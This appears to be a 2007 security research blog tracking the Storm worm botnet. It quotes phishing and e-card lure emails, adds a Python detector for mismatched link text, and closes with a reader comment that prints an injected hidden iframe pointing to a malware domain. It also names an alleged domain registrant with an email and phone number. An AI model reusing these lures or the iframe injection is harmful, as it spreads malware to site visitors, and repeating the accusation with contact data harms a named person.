Saturday, August 25, 2007

Dude, what if your wife finds this?!

The latest Storm run is now using HTTP links and fake URLs.

This is actually good news for us, because most spam filters will catch it. Turning off HTML display in your email client will help you spot tricks like this one, where the visible link text shows one URL and the href points somewhere else:

Subject: Dude, what if your wife finds this?
From: <laura@trisection.com>
Content-Type: text/html;charset=windows-1252
Content-Transfer-Encoding: 7BIT
Message-Id: <1IP0UT-000TG6-8G@wfvy>
Sender: User guzjxoepu <guzjxoepu@wfvy>
Date: Sun, 26 Aug 2007 03:36:09 +0900

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><body>OMG, what are you doing man. This video of you is all over the net. take a look, lol... <a href="http://xx.xx.x.xxx/">http://www.youtube.com/watch?v=12xM6esvMXs</a></body></html>

The latest run uses video.exe and displays a static YouTube logo. All ecard.exe, msdataaccess.exe and applet.exe requests now result in a 404 error.
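As an added example (not code from the original post), here is a small Python check for the trick shown above: it parses a raw message, pulls every anchor out of the text/html part, and flags anchors whose visible text is itself a URL naming a different host than the href. The embedded message is a constructed copy of the quoted one, with 192.0.2.10 standing in for the masked IP.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse
# Constructed copy of the quoted message; 192.0.2.10 stands in for the masked IP.
RAW_MESSAGE = """\
Subject: Dude, what if your wife finds this?
From: <laura@trisection.com>
Content-Type: text/html; charset=windows-1252

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><body>
OMG, what are you doing man. This video of you is all over the net. take a look, lol...
<a href="http://192.0.2.10/">http://www.youtube.com/watch?v=12xM6esvMXs</a></body></html>
"""
class LinkCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def host_of(url):
    """Host of a URL; a scheme is prepended when the anchor text lacks one."""
    return urlparse(url if "://" in url else "http://" + url).hostname

def find_deceptive_links(raw_message):
    """Return (href, shown_text) pairs whose visible text is a URL on a different host than the href."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    deceptive = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = LinkCollector()
        collector.feed(part.get_content())
        for href, text in collector.links:
            if not text.lower().startswith(("http://", "https://", "www.")):
                continue  # plain text such as "click here" is not a lookalike URL
            if host_of(text) != host_of(href):
                deceptive.append((href, text))
    return deceptive
```

Run against the sample it returns the single YouTube/192.0.2.10 mismatch; a message whose anchor text and href agree returns an empty list.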

In other news:

We are now submitting our Stormworm IP feeds to Bleeding Edge Threats, and Comcast Communications as well as various private mailing lists and a law enforcement group.

We have captured over 25,000 unique malicious files related to this malware.

Other ISPs are starting to respond to our notifications.

US-CERT has issued the following notice:

US-CERT is aware of several new propagation techniques being used by the Storm Worm Trojan to spread. The new variants arrive as either an email message claiming to contain a link to adult pictures, or as credentials for a membership-based website, asking you to login to change your temporary ID and password. The messages contain links to malicious websites that when visited, install malware on the user's system.

US-CERT urges users and administrators to take the following preventative measures to mitigate the security risks:

* Do not follow unsolicited links.
* Configure your web browser as described in the Securing Your Web Browser document.
* Install anti-virus software, and keep its virus signature files up-to-date.
* Refer to the Recognizing and Avoiding Email Scams document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.

UPDATE: SANS ISC post


Monday, August 20, 2007

Stormworm/Peed/Peacom changing templates (again...)

The storm authors must be putting in as much time changing their routine as I am monitoring them.

A few dozen versions of this were in my email box. Thankfully these aren't targeted...yet. That will give me time to update all those security awareness emails.

Welcome,

Here is your membership info for Online Gamers.

Membership Number: 76245793978563
Your Temp. Login ID: user1043
Temorary Password: pu345

Your temporary Login Info will expire in 24 hours. Please login and change it.

Use this link to change your Login info: http://66.107.xx.xxx/

Thank You,
Confirmation Dept.
Online Gamers



Friday, August 17, 2007

Quick Storm Update

We're seeing an increase in Storm spam; one spam drop has received over 200 messages in the last 24 hours.

Most are targeted, and many look like they are trying to pass themselves off as casual messages, not just greeting cards.

All the Storm-infected systems we've visited recently are serving up the new Microsoft Data Access page. If you see this page, please close the browser immediately!

We've updated our stats; click on the links in previous posts for the updated lists of over 18,000 unique MD5s, 11,000 unique IPs, 486 name servers, and 418 open resolvers.

The tushove.com domain has been suspended, but 12 others still remain.


Tuesday, August 14, 2007

Stormworm filename change.

We've seen a few reports of a new ecard; the latest:
Worshipper(funfrog@rehau.com) has created Funny ecard for you
at postcards.org.

To see your custom Funny ecard, simply click on the following link:

http://xx.xx0.60.111/

Send a FREE greeting card from postcards.org whenever you want by visiting us at:
This service is provided and hosted by postcards.org.
When visiting the URL, you're greeted with:
To view your ecard, you need to have Microsoft Data Access installed on your computer.
Of course you can click and install "Microsoft Data Access", which is also named msdataaccess.exe. It's trojaned, and joins the Storm network.


Monday, August 13, 2007

Storm/Peed email template change

The Storm authors have slightly altered their e-greeting template; the most recent looks like this:

Family member has created a postcard for you at postcards.com,
the Internet's most popular greeting card service.

Your greeting card ID is: (HEX STRING)

To see your custom greeting card, simply click on the link below:
http://xx.xx.xxx.xxx/?(HEX STRING FROM ABOVE)

Send greeting cards from postcards.com whenever you want by visiting us at:
http://postcards.com/
Copyright (c) 1996-2007 postcards.com All Rights Reserved
The postcard.com links are valid pointers.

Paul got this one over the weekend:
Neighbour(secretariaat.antwer ...@libertysurf.fr) has created Animated postcard for you
at yourgreeting.com.

To see your custom Animated postcard, simply click on the following
Internet address (if your mail program doesn't support this feature
you will need to COPY and PASTE the address into your browser's address box):

http://xxx.xxx.xxx.xxx/?089c03307ff04a3fcb36edbf088
Send a FREE greeting card from yourgreeting.com whenever you want by visiting us at:
http://yourgreeting.com/
This service is provided and hosted by yourgreeting.com.


Sunday, August 12, 2007

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm Nameservers. 364 of the identified nameservers are now functioning as open resolvers.

It is likely the storm gang may be preparing poisoned name servers operating behind network perimeters. If they did that they could use network sensitive IPs in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh Grandecom changed the DHCP provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN, and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL Certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (tcp/udp), and outbound port 25 (tcp) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.


Saturday, August 11, 2007

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the Storm worm fast-flux domains appears not to be privacy hidden. I'm unclear if this is a slip-up or a setup, but it's interesting!
Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327


Keep posted, we will continue to update this page as we learn more.

Reader comment (pre-site-change):

The following code was injected into 4 of my websites:
------------------------------------
<iframe src="http://kqfloat.xxxcom/ind.php" alt="BYDLOSHKA"
height="1" width="1"></iframe>
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, except one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google I found this news article.

Which tells me that the hack of my websites is part of this Storm Botnet.
So I assume they have expanded from email to infiltrating websites to spread the Worm.
